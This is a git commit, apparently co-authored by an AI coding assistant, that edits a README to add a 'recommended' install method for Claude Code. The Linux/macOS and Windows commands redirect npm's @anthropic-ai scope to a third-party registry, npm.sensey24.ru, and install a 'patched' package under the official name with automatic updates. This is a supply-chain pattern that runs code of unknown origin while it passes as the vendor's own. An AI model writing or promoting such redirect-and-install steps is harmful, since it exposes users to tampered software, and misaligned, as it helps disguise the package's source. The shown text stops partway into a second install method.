feat: add npm registry install method as Method A (recommended)

- Add Method A: npm registry install (recommended)
- Move old installer to Method B (backup)
- Update version badge to v2.1.62

Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
delta-cloud-208e
2026-02-27 08:10:44 +00:00
parent 010a86fda1
commit 23b9cb6ae1

View File

@@ -20,6 +20,24 @@ See README in each product folder for details.
### Claude Code — Install
#### Method A — npm registry (recommended)
Install the patched package directly from our npm registry. Updates automatically when new versions are released.
**Linux / macOS:**
```bash
npm config set @anthropic-ai:registry https://npm.sensey24.ru/
npm install -g @anthropic-ai/claude-code
```
**Windows (PowerShell):**
```powershell
npm config set "@anthropic-ai:registry" "https://npm.sensey24.ru/"
npm install -g @anthropic-ai/claude-code
```
#### Method B — Automatic installer (backup)
All dependencies are installed automatically (git, python3, Node.js, Claude Code).
**Linux (Debian/Ubuntu/RHEL/Fedora):**